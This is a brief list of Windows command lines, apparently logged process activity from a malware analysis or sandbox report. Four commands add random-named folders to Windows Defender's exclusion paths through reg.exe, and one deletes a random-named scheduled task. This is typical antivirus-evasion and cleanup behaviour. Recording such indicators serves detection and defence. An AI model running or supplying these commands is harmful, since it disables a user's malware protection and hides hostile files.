- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\cRHunKoNTIE" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\cRHunKoNTIE" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\aVlQuiEOU" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%PROGRAMDATA%\gpONkMBmPnKIKHVB" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "sxUIfhIdgMVQN2"